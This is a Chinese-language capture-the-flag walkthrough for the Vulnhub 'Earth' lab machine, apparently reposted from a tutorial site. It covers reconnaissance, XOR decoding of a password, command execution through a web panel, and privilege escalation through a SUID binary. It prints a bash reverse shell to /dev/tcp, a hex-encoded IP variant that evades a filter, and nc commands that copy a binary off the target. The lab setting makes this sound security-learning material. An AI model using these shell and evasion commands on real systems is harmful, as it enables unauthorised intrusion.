Vulnhub-Earth-有解無憂

Earth靶機下載：https://www.vulnhub.com/entry/the-planets-earth,755/

攻擊機：KALI

資訊搜集

在KALI中使用ARP-SCAN確認靶機IP

arp-scan -l

使用NMAP掃描埠，發現443埠有DNS決議

nmap -A -p 1-65535 192.168.122.135

將DNS加入/etc/hosts

訪問earth.local，發現一些資訊

掃描目錄

dirb http://earth.local/

打開后發現是登陸界面

再次掃描

dirb https://earth.local/

發現存在robots.txt，打開后看到/testingnotes.*

猜測嘗試后發現為txt檔案并打開

根據提示訪問testdata.txt檔案

漏洞攻擊

撰寫XOR腳本，將earth.local的資訊與testdata.txt進行異或運算

import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

運算后得到

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

將輸出的16進制轉換為字符

發現轉換后的內容是回圈的，得出字串earthclimatechangebad4humans

根據之前英文提示使用terra/earthclimatechangebad4humans嘗試登錄

登錄成功并發現輸入框可執行系統指令

使用find命令查找flag

find / -name "*flag*"

查找后打開/var/earth_web/usr_flag.txt得到第一個flag

接下來使用反彈shell連接到靶機

bash -i >& /dev/tcp/192.168.122.131/8888 0>&1

執行后無反應

將IP進行16進制轉換后成功執行

bash -i >& /dev/tcp/0xc0.0xa8.0x7a.0x83/8888 0>&1

提權

查找有權限的命令

find / -perm -u=s -type f 2>/dev/null

發現有個/usr/bin/reset_root

嘗試運行

發現報錯

CHECKING IF RESET TRIGGERS PRESENT... RESET FAILED, ALL TRIGGERS ARE NOT PRESENT. 沒有除錯的命令，使用nc傳送到本地除錯一下

nc -nlvp 8888 >reset_root
nc 192.168.122.131 8888 < /usr/bin/reset_root

使用strace打開

strace /root/reset_root

發現權限不夠，使用chmod

之前執行reset_root報錯是由于缺少三個檔案在靶機中添加這三個檔案

靶機再嘗試運行reset_root

成功提權到root

查找flag后打開

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/489209.html

標籤：其他

上一篇：攻防世界pwn題：forgot

下一篇：本科畢設CTF平臺-MarsCTF